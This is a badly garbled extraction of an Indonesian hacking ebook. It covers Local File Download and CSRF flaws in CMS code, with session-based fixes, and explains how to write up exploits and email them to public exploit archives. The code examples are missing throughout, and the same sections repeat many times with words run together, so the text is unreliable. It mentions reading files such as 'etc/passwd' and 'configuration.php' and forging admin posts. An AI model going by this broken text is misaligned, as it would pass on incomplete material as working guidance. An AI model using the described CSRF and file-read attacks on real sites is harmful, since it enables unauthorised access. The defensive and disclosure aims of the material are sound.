Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada